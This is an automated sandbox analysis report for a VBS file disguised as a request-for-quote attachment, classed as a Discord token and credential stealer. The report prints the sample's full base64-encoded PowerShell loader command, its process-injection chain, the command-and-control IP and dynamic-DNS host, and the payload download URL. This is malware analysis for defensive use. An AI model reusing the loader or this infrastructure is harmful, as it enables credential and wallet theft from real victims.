Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_43200046412000086500125.vbs

Overview

General Information

Sample name:RFQ_43200046412000086500125.vbs
Analysis ID:1591736
MD5:e94f2e506d40bd58b44646f3fac80747
SHA1:cf96f6bd5e8f37b0ec204ea98029de3dd70ecfdb
SHA256:df53a625989cecc35e201e16649966ed99d8df4e71b7b9b53c1a5767e7235332
Tags:vbsuser-lowmal3
Infos:

Detection

Discord Token Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Discord Token Stealer
AI detected suspicious sample
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7568 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7608 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RFQ_43200046412000086500125.vbs.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • InstallUtil.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.2076310345.0000000004CB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000003.00000002.2045997781.0000000009B70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            8.2.InstallUtil.exe.4cb0000.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                3.2.RFQ_43200046412000086500125.vbs.exe.6c521f0.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 3 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==, CommandLine: "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAH
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", ProcessId: 7568, ProcessName: wscript.exe
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe, ProcessId: 7728, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm5sfz2w.xtf.ps1
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7568, ParentProcessName: wscript.exe, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y, ProcessId: 7608, ProcessName: cmd.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", ProcessId: 7568, ProcessName: wscript.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T11:38:34.356744+010028585311Malware Command and Control Activity Detected192.168.2.449737194.226.169.2279910TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                      Source: unknownHTTPS traffic detected: 51.159.14.89:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: powershell.pdbUGP source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: powershell.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
                      Source: Binary string: protobuf-net.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then jmp 074A51F0h3_2_074A5138
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then jmp 074A51F0h3_2_074A5131
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then jmp 098764DFh3_2_09876138
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then jmp 098764DFh3_2_09876148
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then jmp 098710AAh3_2_09870E88
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then jmp 098710AAh3_2_09870E98
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_09B6E680

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.4:49737 -> 194.226.169.227:9910
                      Source: unknownDNS query: name: coloscolorado.duckdns.org
                      Source: global trafficTCP traffic: 192.168.2.4:49737 -> 194.226.169.227:9910
                      Source: Joe Sandbox ViewIP Address: 51.159.14.89 51.159.14.89
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /post-postlogin/Agfdatq.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /post-postlogin/Agfdatq.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: cud-senegal.org
                      Source: global trafficDNS traffic detected: DNS query: coloscolorado.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: 35.37.15.0.in-addr.arpa
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: wscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3ku
                      Source: wscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cud-senegal.org
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cud-senegal.org/post-postlogin/Agfdatq.mp4
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.000000000364C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
